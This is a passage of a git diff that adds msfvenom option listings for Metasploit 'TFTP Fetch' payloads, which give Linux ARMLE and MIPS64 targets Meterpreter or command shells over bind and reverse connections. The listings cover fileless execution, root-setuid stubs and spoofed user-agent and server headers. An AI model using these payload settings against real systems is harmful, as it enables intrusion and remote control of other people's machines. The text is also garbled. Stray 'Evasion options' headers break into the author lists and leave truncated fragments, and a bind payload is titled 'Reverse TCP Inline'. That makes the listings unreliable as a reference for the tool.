payload/cmd/linux/tftp/armle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fbCKMLnTM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-shell-bind_tcp.txt new file mode 100644 index 0000000..fcbc5a4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-shell-bind_tcp.txt @@ -0,0 +1,85 @@ + + Name: TFTP Fetch, Linux dup2 Command Shell, Bind TCP Stager + Module: payload/cmd/linux/tftp/armle/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME VDHecTvPvunA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + dup2 socket in r12, then execve. + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-shell-reverse_tcp.txt new file mode 100644 index 0000000..18fbf7b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-shell-reverse_tcp.txt @@ -0,0 +1,93 @@ + + Name: TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/armle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME auLFBDkDm no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + dup2 socket in r12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-shell_bind_tcp.txt new file mode 100644 index 0000000..15a5063 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-shell_bind_tcp.txt @@ -0,0 +1,76 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/armle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME POpqisoXHgYa no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + Connect to target and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-shell_reverse_tcp.txt new file mode 100644 index 0000000..a98d6aa --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-shell_reverse_tcp.txt @@ -0,0 +1,82 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/armle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + civ + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ARGV0 sh no argv[0] to pass to execve +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME BewNPvfLMi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..87c8325 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mips64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/mips64/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ULcUboOIOpD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..b37792e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mips64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/tftp/mips64/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME cyKaiYttJDPB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a MIPS64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..994a8a5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mips64-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 